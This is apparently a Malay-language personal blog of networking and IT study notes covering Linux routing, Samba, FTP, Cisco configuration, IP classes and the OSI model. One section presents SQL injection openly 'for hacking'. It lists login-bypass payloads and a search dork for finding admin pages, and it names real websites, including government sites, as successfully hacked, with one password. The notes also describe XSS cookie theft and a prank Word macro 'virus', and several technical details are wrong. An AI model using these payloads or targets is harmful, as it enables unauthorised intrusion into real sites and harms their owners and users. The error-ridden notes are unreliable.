BLOGGER TEMPLATES - TWITTER BACKGROUNDS

Monday, June 22, 2009

Keselamatan Dalam Rangkaian

istilah

Istilah-istilah yang berkaitan:

•Penggodam (hacker) boleh membawa maksud seseorang yang mahir dalam bidang komputer; namun media massa selalu menyamakan "penggodam" dengan "penggodam topi hitam".

•Topi hitam (black hat): seseorang yang mensubversi keselamatan komputer tanpa izin atau menggunakan teknologi (biasanya sebuah komputer ataupun internet) untuk tujuan keganasan, vandalisme, penipuan kad kredit, pencurian identiti, pencurian hak milik intelektual, dan sebagainya. Ini juga bermakna mengambil alih kawalan komputer lain melalui sebuah rangkaian, atau perekahan perisian (software cracking).

•Topi kelabu (grey hat): Penggodam yang etikanya tidak jelas atau di batasan undang-undang, seringkali mengaku terang-terang.

•Topi putih (white hat): Penggodam beretika yang memecah keselamatan tetapi untuk tujuan altruistik ataupun sekurang-kurangnya tidak berniat jahat. Topi putih biasanya mempunyai etika yang jelas, dan selalu berusaha untuk bekerja dengan pengilang atau pemilik untuk memperbaiki kelemahan yang dijumpai, walaupun banyak yang mengancam sama ada tersirat atau jelas untuk memaklumkan kepada awam selepas tempoh "sesuai" untuk memastikan respons yang kena pada waktunya. Istilah ini juga digunakan untuk penggodam yang mereka dan mengekod sistem yang lebih selamat.
Perekah/Penggertak (cracker):

•Topi hitam. Sering digunakan untuk membezakan penggodam topi hitam dengan penggodam lain. Penggodam komputer yang menggunakan perekahan kata laluan atau serangan kuasa keras. Berkait denga istilah pemecah peti besi.

•Perekah perisian. Orang yang mengkhusus dalam mengatasi mekanisma perlindungan penyalinan perisian. Tidak mengeksploit rangkaian, cuma perisian.

•Budak skrip (script kiddie): Penceroboh komputer yang tidak begitu mahir; seseorang yang sekadar mengikut arahan ataupun menggunakan teknik buku resepi tanpa memahami langkah yang dibuatnya.

•Hacktivis merupakan penggodam aktivis yang menggunakan teknologi untuk mengumumkan pesanan politik. Perlu dicatat bahawa vandalisme web bukan semestinya hacktivisme.
Alat keselamatan

•Dinding api (rangkaian). Dalam pengkomputeran, dinding api merupakan sejenis perkakasan dan/atau perisian dalam persekitaran rangkaian yang berfungsi untuk menghalang komunikasi yang dilarang oleh polisi keselamatan, serupa dengan fungsi dinding api atau pengadang bahang dalam pembinaan bangunan.

•Sistem pengesanan pencerobohan (IDS) umumnya mengesan manipulasi yang tidak dikehendaki kepada sistem. Manipulasi tersebut boleh jadi serangan oleh penggodam berniat jahat yang mahir, ataupun cuma budak skrip yang menggunakan program automatik.

•Perisian antivirus merupakan program komputer yang cuba mengenal pasti, mencegah dan menghapuskan virus komputer dan perisian jahat (malware) lain.

•Penyulitan digunakan untuk melindungi mesej pengguna dari orang lain. Terdapat banyak cara yang boleh digunakan seperti menukar letak aksara, menggantikan aksara, ataupun membuang aksara dari mesej. Cara-cara ini perlu digabungkan untuk menjadikan penyulitan tersebut lebih selamat, iaitu sukar untuk direkah.

•Keizinan mengehadkan capaian ke komputer kepada sekumpulan pengguna melalui penggunaan sistem pengesahan. Sistem ini boleh melindungi sama ada keseluruhan komputer – seperti melalui skrin log masuk interaktif – atau perkhidmatan individu, seperti pelayan FTP.

•Alat pengimbas kerentanan dan pengimbas port boleh digunakan dengan cepat untuk memeriksa komputer pada rangkaian terhadap kelemahan yang diketahui dan port yang boleh digunakan untuk mencapai komputer tersebut.

Detect Invisable YM

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .

2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.

Alternate Method:
Chose a person you want to check .Double click to open the chat window.Now simply invite the person for a voice conference.This is done by clicking on the "conference' button on the top of the chat window.
If the talk button appears and turns green then that person is online.But if you receive the message 'Voice chat could not be started ' then the person is offline.

LINUX ROUTER...

1. What u need to have?
- at least 2 network card
- 2 cross cable
- install fedora 10 (for configuration)

2. What u need to do?
- set IP forwarding
- set IP
- routing (buat routing + gw)

* Linux router guna command line untuk configuration

1. nak upkan network card
service network restart
/etc/init.d/network restart
eth0 .................................[/]
eth1 ................................ [/]

2. set ip
/sbin/ifconfig eth0 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255

3. set gateway
/sbin/route add-net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.255 dev eth0

4. set ip_forwarding
echo 1 > proc/sys/net/ipv4/ip_forward
(0 untuk stop) dan (1 untuk up)

5. tengok routing table
/sbin/ip route show

6. tengok ada routing @ x
/sbin/route -v

7. delete routing dalam routing table
/sbin/route del -net ............./sm

8. up network card one by one
/sbin/if up eth0
/sbin/if up eth1

** if pc <-> x bole nak ping:
- firewall pc x off
- anti virus x off
- ip_forwarding tiap kali x up
- firewall linux->ip table

WEB Devolepment

Web Development dibahagikan kpd 2 :
• Static --- Pure HTML
• Dynamic

Static
• Content
• nk ubah/edit perlu buka semula fail tersebut
• pages yang tersedia

Dynamic
• content can be anything (dynamicly loaded into web page)
• Develop guna mySQL & PHP
• Keperluan : web server (-> apache) + mySQL + PHP
• Software : WAMP, XAMP, Easy PHP [ ada ketiga-tiga keperluan diatas -packages)
Web Authoring Tools -> Dreamweaver

Buat folder untuk...( step )
1. /var/www/html
2. mkdir shadia
3. vim index.html

Web development is a broad term for any activities related to developing a web site for the World Wide Web or an intranet.
This can include e-commerce business development, web design, web content development, client-side/server-side coding, and web server configuration.
However, among web professionals, "web development" usually refers only to the non-design aspects of building web sites, e.g. writing markup and coding.
Web development can range from developing the simplest static single page of plain text to the most complex web-based internet applications, electronic businesses, or social network services.

For larger businesses and organizations, web development teams can consist of hundreds of people (web developers).
maller organizations may only require a single permanent or contracting webmaster, or secondary assignment to related job positions such as a graphic designer and/or Information systems technician.
Web development may be a collaborative effort between departments rather than the domain of a designated department.
Reference-http://en.wikipedia.org/wiki/Web_development

FTP

Ni da skit nota pasal ftp untuk load file dalam domain web yang aku kena buat..huhu

FTP

1. What is FTP? #
FTP stands for File Transfer Protocol and it is the process used to upload and download files from a web server. This is done using an FTP program.

2. Do you recommend any FTP programs? #
Here are a few FTP programs that we recommend:

Windows
o BulletProof FTP
o CuteFTP
o WS_FTP

Mac
o Transmit
o Cyberduck
o Captain FTP
o Interarchy
o BulletProof FTP
o CuteFTP
o Fetch
o Coda

3. What information needs to be entered into a FTP or web design program in order to upload files to the server? #
server/hostname: your-domain.comusername: your-usernamepassword: your-passwordremote directory: httpdocsport: 21
To help you with this, we have created some screen shot examples of FTP configurations for a few popular FTP programs and web design applications with a built-in FTP feature.

4. The website is not loading in a browser after the files have been uploaded to the server, what might be causing this? #
1. Double check that you have uploaded your files to the httpdocs folder
2. Check that you have named your default page: index.html, index.htm or index.php

5. A FTP program is having some problems connecting to the server, how do you troubleshoot this? #

0. Make sure that you have entered all the proper FTP information for your website. This was provided in the account information email that we sent to you when your website became live on our server. If you no longer know your FTP password, you can reset it using your control panel. If you no longer know your control panel password, just enter a support ticket through our Help Desk and ask us to reset both your control panel and FTP passwords and re-send your account access info.
1. Do not add “ftp.” before your domain name. Your server/host name is just your domain name only, without any prefixes.
2. Double check that your FTP program is set to access port number 21.
3. Verify that you currently have a connection to the internet and that your ISP is not having any problems.
4. If you are behind a firewall, make sure that it is not configured to block access to port 21 on outbound connections. Also, you could try enabling “passive mode” on your FTP program since some firewalls require this when using FTP.
5. If you have a slow connection (ie dial-up), try increasing the time-out value setting in your FTP program. For instance if the default is 60:00, try changing it to 120:00. This is a common issue with Dreamweaver and this fix often solves the problem.
6. If you are running a BitTorrent program, you need to pause it or turn it off. BitTorrent programs require a massive amount of your internet connection’s uploading/downloading resources to run. Running a BitTorrent program while trying to FTP will cause extremely slow and almost non-existant upload/download times.

6. When the files are uploaded to the server they are corrupted, what might be causing this? #
Make sure that your FTP application is set to automatically detect ACSII or binary mode.

7. How do you change the password for FTP access? #
The password for FTP can be reset using your control panel.

0. Log in to your control panel.
1. Select the domain name.
2. Click on “Setup”.
3. Next to the “New FTP Password” box, enter the new password. Next to the “Confirm Password” box, enter the new password again, then select “OK”
8. Do you offer anonymous FTP? #
For security reasons, we do not support anonymous FTP.
9. Is it possible to upload files to a website using SFTP (Secure FTP) or SCP (Secure Copy)? #
We do not offer SFTP or SCP access to our servers because it would require granting shell access. For security reasons, we do not offer shell access under any circumstances. The improved security that comes from SFTP and SCP is far outweighed by the risks inherent to the enabling of shell access on a public server.

Samba Setting

* 2 os yang berbeza (linux & windows)

* untuk security(kalo folder ada dalam linux)

1. rpm -q samba
*nak check ada samba @x
*install samba (cd,internet,server)

2. yum -y install samba
*download & install trus dari internet
*/sbin/ifconfic -> nak check ip pc
*wget http://10.1.0.11/fedora/pacakges/samba -3.0.26a-6.fc8.1386.rpm

3.edit samba configuration
*security=user
*workgroup=_____

4.create share folder [xyz]
*path=/xyz ->folder mana
*writeable=yes ->bole save/write
*browse dble=yes ->org bole browse

5.create folder to share
*ex:/xyz
* #mkdir /xyz
* #chmod 777/xyz

6.create Linux user account & samba account
* add user insep
* password insep
* smb password -a insep

Linux Shutdown Command Line

Linux: Reboot: How to reboot from the command line??
Method: reboot from the command line:
shutdown -fr now # restarts
or
shutdown -r now # restarts
or
reboot
---
---
Method: reboot using
When in a text mode screen,
press
---
SHUTDOWN LINUX
----------------------------------------------------------------------
Linux: shutdown: How to shutdown from the command line??
Method: shutdown from the command line:
shutdown -fr now # shutdown

PHP

use terminal and use this command :

- su root
- [password]
- cd /media/Fedora/10\i386\DVD/Packages/
- ls | grep php
- (will show you list all php packages)
- rpm -ivh
- vim/var/www/html .php

[Coding PHP]

echo ("whatever you want to say
");

for ($i=1; $i<=10; $i++){
for ($j=1; $j<=i; $j++){

echo("whatever");

}

echo ("
");

}
?>

- klik 'i' untuk insert
- esc
- :wq
- buka mozilla and taip http://127.0.0.1/(your file name).html

Buat HTML Apache (Fedora10)

In terminal, use this command :

- su
- [password]
- services httpd status (untuk cek status httpd samada start/stop)
- services httpd start
- cd/var/www/html
- vim index.html (untuk edit coding dlm index.html)
- press 'i' to edit text
- finish edit, press 'Esc' and ':wq'
- to view html, occasionally use localhost (127.0.0.1)

Terlupa Password Dalam Linux - Have been try with Fedora 10

* Restart Pc
* tekan arrow kebawah sblm nak masuk windows ( screen utk pilih boot fedora or windows)
* Tekan huruf 'E' untuk edit
* taip single
* Enter
* Tekan huruf 'B' untuk Boot
* Password 'user yang digunakan skrg'
* Enter, new password
* REBOOT!!

NFS

- digunakan apabila hard disk dalam server dah penuh dan tiada slot untuk tambah hard disk lan.

- memerlukan 2 biji komputer

- automatik install dalam fedora

- install dalam server utama sahaja

- umount = eject

- mount = declare device yang masuj dalam pc hak miliknya

- security

- copy file as who you are in another pc not like Samba, it can assume anybody

LINUX ROUTER

1. Copy
-Fedora 8 - iso 10.1.0.11/installer (DVD)

2. What u need to have?
-at least 2 network card
-2 cross cable
-install fedora 8 (configuration)

3.What u need to do?
-set IP_forwarding
-Routing (buat routing + gw)


Example Command

root atau su
password

for cent0S (up net.card) - service network restart

for fedora - /etc/int.d/network restart
- eth0 [ok]
- eth1 [ok]
Guna GUI
-upkan eth0-network card
eth0-address=192.168.1.1
gw= xyah
subnetMask=255.255.255.0

eth1-active
-static

/sbin/ifconfig eth0 192.168.1.1 netmask 255.255.255.0
broadcast 192.168.1.255
/sbin/route add -net 192.168.1.0 netmask 255.255.255.0
gw 192.168.1.1 dev eth0
echo 1 > /proc/sys/net/ipv4/ip_forward

-ping ip gw -ping ip pc


*bila setiap kali restart network.... arahan IP_forwading perlu di run semula*
cat /proc/sys/net/ipv4/ip_forward - arahan untuk papar sama ada echo 0 atau 1. Jika 0 perlu run arahan IP_forwarding


*pc ke pc x leh link krn:
-firewall pc x off
-firewall linux pd ip table x off
-antivirus x off
-x up IP_forwarding setiap kali restart

Other Command

1.up network card
-service network
/etc/init.d/network

2.tengok routing table
/sbin/ip router show

3.tengok ada routing @ tak ada
/sbin/router -v

4.delete routing dlm routing table
/sbin/route del -net (ip)

5.up network card one by one
/sbin/ifup eth0 (enter)
/sbin/ifup eth1 (enter)

Remote SCQ Injection

- Injection dibuat pada URL/address
Cth Injection :
Cth URL/address Injection: http://www.kismec.org.my/(injection)

-Apabila berjaya, maklumat senarai username dan password akan dipaparkan.
-Namun hanya username dipapar dlm bentuk plaintext.
-Password di papar dlm bentuk hash (md5 coder atau base64 coder).-Password ini perlu di decrypt untuk mendapatkannya dlm bentuk plaintext.

Cross Site Scripting (XSS)

What is Cross Site Scripting?
-Satu teknik yang digunakan oleh attacker untuk hantar sebarang script pada web user. XSS biasanya berlaku pd aplikasi web. Script yang biasa digunakan adalah VB dan JAVA.

Cth: script alert(……..); /script (pada perkataan script perlu di letak<>)

- Kaedah masukkan script (biasanya VB script, JAVA script) di computer target utk dptkan cookies website yg diingini. Apabila dpt cookies, ia disimpan dlm server. Oleh itu attacker akan dpt masuk website yg target access td dgn senang. Kemudian boleh buat malicious lain (hack kaedah lain).

- Sebuah serangan cross site scripting dilakukan dengan menyediakan alamat khusus yang dikemas oleh penyerang untuk calon korbannya. Dalam konteks XSS, penyerang mengundang korbannya untuk mengeksekusi alamat URL yang diberikan dan membiarkan korban mengikuti link tersebut dengan menjalankan script yang sebelumnya beraksi di komputer klien untuk mendapatkan informasi yang diinginkannya.

How To Protect From SQL Injection

1’or’1’=’1

The Way:- if………else statement (bhgian login).

- escape ‘ ’ ’ single code.
- Parameter statement – setkan size (username, password)
- Username change to email (code must put @ - email address)

- protect di server level (block stament)

$SQL = “Select nama_penyelia
from penyelia where username=’$name’ and password=’$pass’;

Letak if statement sebelum sql statement.

If($name==”1’or’1’=’1’”) {break;}

Tujuan: - check $name contain " ' " – reject kali ada single code ‘ ’ ’.

-

-

Cross Site Scripting

-

-attack di coding.

SQL Injection - a way to login web admin without password and username

Apa itu SQL Injection?
- vulnarable system/ internet website. ‘Magic Code’. ‘String Code’.
- technique that exploits a security vulnerability occurring in the database layer of an application.

Buat ape?
-kod untuk pecah masuk sesuatu system atau website yang mempunyai kata laluan.

Bila masa nak guna?
-masa nak hacks la……

Masuk website: http://www.milw0rm.com/
____________http://www.warexe.com/

copy kod ini - kamal' or '1'='1 // input pada username: passwd:
// atau pada login: pswd:
// atau userid: pswd:


cara cari laman web yang ada login dan admin:

google search: inurl: admin.php username password


code/magic kod untuk hack melalui pass n username

a' or 't'='t

(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1’or’1’=’1


Laman yang berjaya di hack

http://myeshop4u.com/admin.asp
http://asp.tech-cats.com/CareerTicket/admin/index.asp?logout=1
http://www.cashflowfromcreditcards.com/admin.asp
http://www.roomtwentyfour.com/aspproofs/admin.asp
http://www.azgoldenretrieverconnection.org/logon.asp
http://www.frim.gov.my/library/opac/pustakafiles/OPAC/admin.asp
http://www.kesedar.gov.my/Maklum%20Balas/admin.htm
http://www.compserv.sabah.gov.my/halalsabahsoaljawab/admin.asp
http://www.vistaexcellence.com/home.php
http://demo.webwizforums.com/admin.asp (password =letmein)

Sniffer(Hacking Tool)

-tools untuk hidu
-Network Sniffer
-Packet Sniffer

Example sniffer tools: cain&adel, wireshark, ettercap, ethereal dan banyak lagi..

X leh...
-plain – https = encrypted data tp pakai mitm boleh
-mitm (men in the middle) = org tengah
Ethercap, cain guna mi

Cisco Router Protocol

Apa itu protocol ? – peraturan, standard
Cisco router – EGP, OSPF, RGP, IGRP and other………………….

UTP cable – maxima long – 100 meter - 4 pair,8 wire.1,2,3,6 wire for sent data. but can use for 2 pc.
- Pintalan dalam wayar berbeza-beza utk pengaruhi medan magnet wayar.

PSTN – Public Switching Telephone Network
Telekom offer – 9.6 kbps, 34.4 kbps, 64 kbps, 56 kbps, 128 kbps, 512 kbps, 1 mb, 2 mb, 10 mb.

Why minta 10 mb tp bila connect kelajuan tak capai 10 mb sepenuhnya.
Data loss – data collection, signal destruction

Clockrate – use depend yourself – try one by one..

100 mbps – belum tentu paling laju – kalau data jam, transmission akn lambat..
Visual Route 2008 –tool for tress router..

Built Network With Cisco Router

What to do?
set ip address
set router
buat routing

What need to have?
cisco router
DCE cable
Console Cable – untuk device sama ( PC ke PC)
Straight Cable – untuk device x sama (PC ke Router)

Element to think ….
Topology/network design
configure router

client = .100
gw = .1
s0 = .1
s1 = .2

To Start Configure..
-Start
-Accessories
-Communication
-Hyper Terminal
-put name and icon
-change bit per second to 9600
-off and on Cisco router
-Loading and type no to choose option.
-follow the command and refer the topology.

Cisco Router

Version – CCNA
- FREEZCO

Use – fastEtharnet(f/e)
- Ethernet (E)

Coding for configure Cisco router CCNA

Router>enable
Router#config terminal
Enter configuration commands, one per line. End with CNTL/Z.

*********** Setup Hostname *************
Router(config)#hostname LAB_A


*********** Start Setup Serial 0/0 Interface with DCE connection *************

Utk configure serial ajeLAB_A(config)#interface Serial 0/0
LAB_A(config-if)#ip addr 10.2.2.1 255.255.255.0
LAB_A(config-if)#clockrate 64000
LAB_A(config-if)#no shutdown
LAB_A(config-if)#
00:08:29: %LINK-3-UPDOWN: Interface Serial0/0, changed state to up
00:08:30: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0, changed state to up
LAB_A(config-if)#exit
LAB_A(config)#exit
LAB_A#

*********** End Setup Serial 0/0 Interface with DCE connection *************


*********** Check Interface *************

LAB_A#show interfaces summary

*: interface is up
IHQ: pkts in input hold queue IQD: pkts dropped from input queue
OHQ: pkts in output hold queue OQD: pkts dropped from output queue
RXBS: rx rate (bits/sec) RXPS: rx rate (pkts/sec)
TXBS: tx rate (bits/sec) TXPS: tx rate (pkts/sec)
TRTL: throttle count

*********** Start Setup Fast Ethernet l 0/0 Interface *************

LAB_A#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
LAB_A(config)#interface fastethernet 0/0
LAB_A(config-if)#ip addr 10.1.1.1 255.255.255.0
LAB_A(config-if)#no shutdown
LAB_A(config-if)#
00:16:14: %LINK-3-UPDOWN: Interface FastEthernet0/0, changed state to up
LAB_A(config-if)#exit
LAB_A(config)#exit
LAB_A#

*********** END Setup Fast Ethernet l 0/0 Interface *************

*********** Check Interface *************

LAB_A#show interfaces summary

*: interface is up
IHQ: pkts in input hold queue IQD: pkts dropped from input queue
OHQ: pkts in output hold queue OQD: pkts dropped from output queue
RXBS: rx rate (bits/sec) RXPS: rx rate (pkts/sec)
TXBS: tx rate (bits/sec) TXPS: tx rate (pkts/sec)
TRTL: throttle count

**********************************************************************
FastEthernet0/0 did Not UP yet because of Another Router did Setup yet
**********************************************************************

*********** Check Interface fast Ethernet 0/0 Detail *************

LAB_A#sh int fast 0/0

FastEthernet0/0 is up, line protocol is down
Hardware is AmdFE, address is 000d.28ef.bac0 (bia 000d.28ef.bac0)
Internet address is 10.1.1.1/24
MTU 1500 bytes, BW 100000 Kbit, DLY 100 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation ARPA, loopback not set
Keepalive set (10 sec)
Auto-duplex, Auto Speed, 100BaseTX/FX
ARP type: ARPA, ARP Timeout 04:00:00
Last input 00:23:34, output 00:00:04, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: fifo

**********************************************************************
Let setup FastEthernet0/1 at LAB_B router
**********************************************************************
LAB_B(config)#int fast 0/1
LAB_B(config-if)#ip addr 10.1.1.2 255.255.255.0
LAB_B(config-if)#no shutdown
LAB_B(config-if)#
00:29:54: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to up
00:29:56: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
LAB_B(config-if)#

*********** End Of setup FastEthernet0/1 At LAB_B router *************

LAB_A#sh int sum

*: interface is up
IHQ: pkts in input hold queue IQD: pkts dropped from input queue
OHQ: pkts in output hold queue OQD: pkts dropped from output queue
RXBS: rx rate (bits/sec) RXPS: rx rate (pkts/sec)
TXBS: tx rate (bits/sec) TXPS: tx rate (pkts/sec)
TRTL: throttle count

*********** Start Setup routing protocol using RIP ****************

LAB_A(config)#router rip
LAB_A(config-router)#network 10.1.1.0
LAB_A(config-router)#network 10.2.2.1
LAB_A(config-router)#

*********** End Setup routing protocol using RIP ****************

*********** Start Register IP host lookup table ****************

LAB_A(config)#ip host LAB_A 10.1.1.1 10.2.2.1
LAB_A(config)#ip host LAB_B 10.1.1.2 10.2.2.2

*********** End Register IP host lookup table ****************
________________________________________________________________________________

A – PH,H,PJ,B,PB,J,PC,CC,SC
B – PJ,J,PH,B,PB,H,PC,C,AB,BB

Network cabling

4 UTP cable
1. Unshielded Twisted Pair – telekomunikasi-telephone, internet.
2. Shielded Twisted Pair – same –lebih tahan, distance.
3. Coaxial Cable – tv dan cctv.
4. Fiber Optic Cable – noise, tahan haba, mahal, kelajuan cahaya, data laju, tahan kelembapan.

Two Standards
1. EIA/TIA 568 B (British) – Straight cable (B – B)
2. EIA/TIA 568 A (AMERICAN) - Straight cable (A – A)

Book For Computer Security

Red Book
-RSA Trusted Network – DOD Standard
-Bible for Computer Security
-Every massage is secret that encryption technique
-Use picture format is very strong to sent secret massage- terdpt ruang di dalam saiz picture tersebut.
Cth: saiz picture 100 KB tp sebenarnya ada ruang lg.

Julius Caesar ( tokoh tertua dlm secret massage) (3 step chipping)
http://en.wikipedia.org/wiki/Caesar_cipher

Plain : ABCDEFGHIJKLMNOPQRSTUVWXYZ
Cipher: DEFGHIJKLMNOPQRSTUVWXYZABC

Example: -COMPUTER
-----------FRPSXWHU

ViruS JoKe wiTh MacRo

SIMPLE VIRUS

Tools – Macro – Visual Basic Editor - This Document

Tulis :

Sub FileSaveAs() ----------------check at Tools – Macro – Macro – choose word command
MsgBox “Padan Muka”
End Sub

To Protect :

Tools – Macro – Security – choose very high

DOMAIN NAME SERVER

Pengertian,Kekurangan,Kelebihan Dan fungsi dari DNS Server

DNS Server

Pengertian DNSDomain Name System (DNS) adalah Distribute Database System yang digunakan untuk pencarian nama komputer (name resolution) di jaringan yang menggunakan TCP/IP. DNS merupakan sebuah aplikasi service yang biasa digunakan di internet seperti web browser atau e-mail yang menerjemahkan sebuah domain ke IP address.

Fungsi DNS

Fungsi dari DNS adalah menerjemahkan nama komputer ke IP address (memetakan nama komputer menjadi IP address).

Kelebihan DNS
1. Mudah, DNS sangat mudah karena user tidak lagi direpotkan untuk mengingat IP address sebuah komputer, cukup host name.
2. Konsisten, IP address sebuah komputer bisa saja berubah, tapi host name tidak harus berubah.
3. Simple, DNS server mudah untuk dikonfigurasikan (bagi admin).

Kekurangan DNS
1. User tidak dapat menggunakan nama banyak untuk mencari nama domain baik di internet maupun di intranet.

IP Address

IP address digunakan untuk mengidentifikasi interface jaringan pada host dari suatu komputer. Dengan adanya IP address masing-masing host dapat terhubung dan saling bertukar informasi melalaui media transmisi kabel seperti UTP, koaksil atau fiber optic. Sebagai contoh sederhana, jika sebuah surat akan dikirimkan/ ditujukan ke orang lain maka surat tersebut harus dilengkapi dengan alamat lengkap si penerima. Tentu juga alamat si pengirim perlu dicantumkan untuk memudahkan penerima dari mana datangnya surat tersebut. Jika alamat si penerima tidak lengkap misalnya tidak ada nomor rumah, tidak di cantumkan nama penerima maka surat tersebut dipastikan tidak akan sampai.

IP address adalah sekelompok bilangan biner 32 bit yang dibagi menjadi 4 bagian yang masing-masing bagian itu terdiri dari 8 bit, angka pada masing-masing bit tersebut adalah angka 1 dan 0. misalnya : 11000111. Nilai paling besar dari biner 8 bit adalah 255, angka 255 ini dihitung dari bilangan biner 2 berpangkat.Misalnya :11111111 = 27 + 26 + 25 + 24 + 23 + 22 + 21 + 20= 128 + 64 + 32 + 16 + 8 + 4 + 2 + 1= 255Dengan demikian IP address yang terdiri dari 4 bagian bilangan 8 bit maka nilai terbesar IP address tersebut adalah11111111.11111111.11111111.11111111 atau 255.255.255.255.255Untuk memudahkan kita dalam membaca dan mengingat suatu alamat IP maka umumnya penamaan yang digunakan adalah berdasarkan bilangan desimal.IP address dibagi menjadi kelas-kelas yang masing-masing mempunyai kapasitas jumlah IP yang berbeda-beda. IP address terdiri dari dua bagian yaitu bagian network ID dan host ID. Network ID menunjukkan ID alamat jaringan tempat host-host berada sedangkan host ID adalah bagian yang menunjukkan host itu berada. Sederhananya, Network ID seperti nama jalan sedangkan Host ID adalah nomor rumah di jalan tersebut.Kelas-kelas IP address adalah sebagai berikut :

Kelas A
IP address kelas A terdiri dari 8 bit untuk network ID dan sisanya 24 bit digunakan untuk host ID, sehingga IP address kelas A digunakan untuk jaringan dengan jumlah host sangat besar. Pada bit pertama berikan angka 0 sampai dengan 127.
Karakteristik IP Kelas AFormat : 0NNNNNNN.HHHHHHHH.HHHHHHHH.HHHHHHHHBit Pertama : 0NetworkID : 8 bitHostID : 24 bitBit Pertama : 0 -127Jumlah : 126 (untuk 0 dan 127 dicadangkan)Range IP : 1.x.x.x – 126.x.x.xJumlah IP : 16.777.214Misalnya IP address 120.31.45.18 makaNetwork ID = 120HostID = 31.45.18Jadi IP di atas mempunyai host dengan nomor 31.45.18 pada jaringan 120

Kelas B
IP address kelas B terdiri dari 16 bit untuk network ID dan sisanya 16 bit digunakan untuk host ID, sehingga IP address kelas B digunakan untuk jaringan dengan jumlah host tidak terlalu besar. Pada 2 bit pertama berikan angka 10 sehingga bit awal IP tersebut mulai dari 128 – 191.
Karakteristik IP Kelas BFormat : 10NNNNNN..NNNNNNNN.HHHHHHHH.HHHHHHHHBit Pertama : 10NetworkID : 16 bitHostID : 16 bitBit Pertama : 128 -191Jumlah : 16.384Range IP : 128.1.x.x – 191.155.x.xJumlah IP : 65.532Misalnya IP address 150.70.45.18 makaNetwork ID = 150.70HostID = 60.56Jadi IP di atas mempunyai host dengan nomor 60.56 pada jaringan 150.70

Kelas C
IP address kelas C terdiri dari 24 bit untuk network ID dan sisanya 8 bit digunakan untuk host ID, sehingga IP address kelas C digunakan untuk jaringan untuk ukuran kecil. Kelas C biasanya digunakan untuk jaringan Local Area Network atau LAN. Pada 3 bit pertama berikan angka 110 sehingga bit awal IP tersebut mulai dari 192 – 223.

Karakteristik IP Kelas C
Format : 110NNNNN.NNNNNNNN.NNNNNNNN.HHHHHHHHBit Pertama : 110NetworkID : 24 bitHostID : 8 bitBit Pertama : 192 - 223Jumlah : 16.384Range IP : 192.0.0.x.x – 223.255.255.x.xJumlah IP : 254 IPMisalnya IP address 192.168.1.1 makaNetwork ID = 192.168.1HostID = 1Jadi IP di atas mempunyai host dengan nomor 1 pada jaringan 192.168.1Kelas IP address lainnya adalah D dan E, namum kelas IP D dan E tersebut tidak digunakan untuk alokasi IP secara normal namum digunakan untuk IP multicasting dan untuk experimental

7 LAYER DALAM OSI MODEL

Application Layer

Lapisan ini memberikan perkhidmatan kepada pengguna dalam persekitaranOSI dan lazimnya digunakan oleh Sistem Operasi Rangkaian (NetworkOperating System).
Di antara perisian popular yang menggunakan lapisan ini ialah:
1. Telnet
2. Protokol Pindahan Fail (File Transfer Protocol, FTP)
3. Sistem Fail Rangkaian, Sun (Network Filing System, NFS)
4. AppleShare, Apple
5. Netx, Novell 6. DOOM (iD Software).

Contoh protokol yang digunakan di lapisan ini ialah:
1. DNS
2. Protokol Pindahan Fail Mudah (Trivial File Transfer Protocol, TFTP)
3. Protokol Pengurusan Rangkaian Mudah (Simple Network ManagementProtocol, SNMP)
4. Protokol Pemindahan Mel Mudah (Simple Mail Transfer Protocol, SMTP)
5. BOOTP (Bootstrap Protocol)
6. RLOGIN
7. MIME
8. NFS
9. FINGER

Presentation Layer

Lapisan ini menukar data kepada format paparan bagi membolehkan penggunaberhubung dengan mana-mana klien. Dengan erti kata lain, lapisan ini menukarkan Rujukan Rangkaian Standard (Standard Network References) kepadastandard komputer yang digunakan. Pada lapisan ini juga kefahaman atau kesamaan (establishesunderstanding) dicapai bagaimana setiap mesin atau komputer perlumengemuka dan menerima data dengan komputer lain.

Contoh protocol yang digunakan di lapisan ini ialah:
1. HTTP
2. Telnet
3. AppleTalk Filing Protocol (AFP)

Session Layer


Fungsi utama lapisan ini ialah untuk membolehkan dua stesen berhubungdan memberitahu stesen yang berkenaan sekiranya ada kerosakan padasambungan kedua-duanya serta memutuskan talian sambungan jika diarah. Lapisan ini juga mengawal struktur di antara komunikasi dengan perisianserta menjaga log masuk (login) dan kata laluan (password), sambungan yangdiwujudkan ke komputer lain dan memastikan penggunaan rangkaian yang sah.
Contoh protocol yang digunakan di lapisan ini ialah:
1. Protokol Kawalan Transmisi (Transmission Control Protocol, TCP)
2. Sambungan tertentu (Named Pipes)
3. NetBIOS
4. Protokol Apple: ASP, ZIP, ADSP, PAP

Transport Layer

Bahagian ini berkhidmat sebagai penjamin keutuhan (integrity) rangkaian.Protokol ini akan memastikan semua informasi atau paket sampai kedestinasinya dan akan memberitahu stesen penghantar mengulangipenghantaran paket jika ada yang tidak diterima atau diterima tetapi tidaklengkap. Lapisan ini juga bertanggung jawab untuk memisah dan mengumpul pesananyang panjang, keutuhan data dan alamat (addressing).

Contoh Protocol yang digunakan di lapisan ini.
1. Protokol Kawalan Transmisi (Transmission Control Protocol, TCP)
2. Protokol Datagram Pengguna (User Datagram Protocol, UDP)
3. NetBIOS/NetBEUI
